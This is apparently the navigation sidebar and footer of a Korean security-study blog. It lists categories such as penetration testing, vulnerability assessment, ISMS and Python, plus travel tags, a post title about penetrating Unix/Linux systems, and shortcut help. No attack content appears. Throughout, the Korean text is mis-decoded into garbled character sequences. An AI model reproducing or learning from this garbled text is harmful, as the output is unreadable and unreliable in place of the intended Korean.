        • ๋ชจ์˜ ํ•ดํ‚น (12)
        • ์ทจ์•ฝ์  ์ง„๋‹จ (3)
        • ๋””์ง€ํ„ธํฌ๋ Œ์‹ (1)
      • ๐Ÿ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P ์ธ์ฆ (2)
      • ๐Ÿ“ฐ ๋ณด์•ˆ ๋‰ด์Šค & ํŠธ๋ Œ๋“œ (1)
        • ์ตœ์‹  ๋ณด์•ˆ ์ด์Šˆ (1)
        • ์‚ฌ์ด๋ฒ„ ์œ„ํ˜‘ ์ •๋ณด (0)
        • ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค ๋ฆฌ๋ทฐ (0)
      • ๐Ÿ”ฅ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • ๊ณผ์ œ (4)
        • ๋ชจ๋“ˆ ํ”„๋กœ์ ํŠธ (8)
        • ์ตœ์ข… ํ”„๋กœ์ ํŠธ (0)
      • ๐Ÿ—‚๏ธ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • ๐Ÿงฉ Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
      • ๐Ÿ‘ฅ ๋ฒ„์ „๊ด€๋ฆฌ & ํ˜‘์—…๋„๊ตฌ (9)
        • Git, GitHub (4)
        • etc (5)
      • ๐Ÿ’œ ์ผ์ƒ (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ํƒœ๊ทธ
    • ๋ฐฉ๋ช…๋ก
  • ๋งํฌ

    • GitHub
  • ๊ณต์ง€์‚ฌํ•ญ

    • ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค!
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    sk์‰ด๋”์Šค๋ฃจํ‚ค์ฆˆ
    ์™€์ด์–ด์ƒคํฌ
    ์œ ๋Ÿฝํ•œ๋‹ฌ์—ฌํ–‰
    ๋ธ”๋ก์ฒด์ธ์‹ค์Šต
    ์ฝ”๋”ฉํ…Œ์ŠคํŠธ
    ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค
    ๊นƒํ—ˆ๋ธŒ
    ํ”Œ๋ผ์Šคํฌ
    ํ”„๋ž‘์Šค์—ฌํ–‰
    ์œˆ๋„์šฐ๋ณด์•ˆ
    Github
    ๋ณด์•ˆ์‹ค์Šต
    ํŒŒ์ด์ฌ
    ์˜นํ”Œ๋ขฐ๋ฅด
    ์œ ๋Ÿฝ์—ฌํ–‰
    ํ•œ๋‹ฌ์—ฌํ–‰
    flask
    git
    Python
    VSCode
    ๋Ÿฐ๋˜์—ฌํ–‰
    ํ•ด์™ธ์—ฌํ–‰
    ํ˜‘์—…๋„๊ตฌ
    ๋ชฝ์ƒ๋ฏธ์…ธ
    ์นผ๋ฆฌ๋ฆฌ๋ˆ…์Šค
    slack
    ํŒŒ๋ฆฌ์—ฌํ–‰
    ์ •๋ณด๋ณด์•ˆ
    ๋ชจ์˜ํ•ดํ‚น
    ๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

  • 160x600
  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.3
WISHee
[๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ

๊ฐœ์ธ์ •๋ณด

  • ํ‹ฐ์Šคํ† ๋ฆฌ ํ™ˆ
  • ํฌ๋Ÿผ
  • ๋กœ๊ทธ์ธ
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”

๋‹จ์ถ•ํ‚ค

๋‚ด ๋ธ”๋กœ๊ทธ

๋‚ด ๋ธ”๋กœ๊ทธ - ๊ด€๋ฆฌ์ž ํ™ˆ ์ „ํ™˜
Q
Q
์ƒˆ ๊ธ€ ์“ฐ๊ธฐ
W
W

๋ธ”๋กœ๊ทธ ๊ฒŒ์‹œ๊ธ€

๊ธ€ ์ˆ˜์ • (๊ถŒํ•œ ์žˆ๋Š” ๊ฒฝ์šฐ)
E
E
๋Œ“๊ธ€ ์˜์—ญ์œผ๋กœ ์ด๋™
C
C

๋ชจ๋“  ์˜์—ญ

์ด ํŽ˜์ด์ง€์˜ URL ๋ณต์‚ฌ
S
S
๋งจ ์œ„๋กœ ์ด๋™
T
T
ํ‹ฐ์Šคํ† ๋ฆฌ ํ™ˆ ์ด๋™
H
H
๋‹จ์ถ•ํ‚ค ์•ˆ๋‚ด
Shift + /
โ‡ง + /

* ๋‹จ์ถ•ํ‚ค๋Š” ํ•œ๊ธ€/์˜๋ฌธ ๋Œ€์†Œ๋ฌธ์ž๋กœ ์ด์šฉ ๊ฐ€๋Šฅํ•˜๋ฉฐ, ํ‹ฐ์Šคํ† ๋ฆฌ ๊ธฐ๋ณธ ๋„๋ฉ”์ธ์—์„œ๋งŒ ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.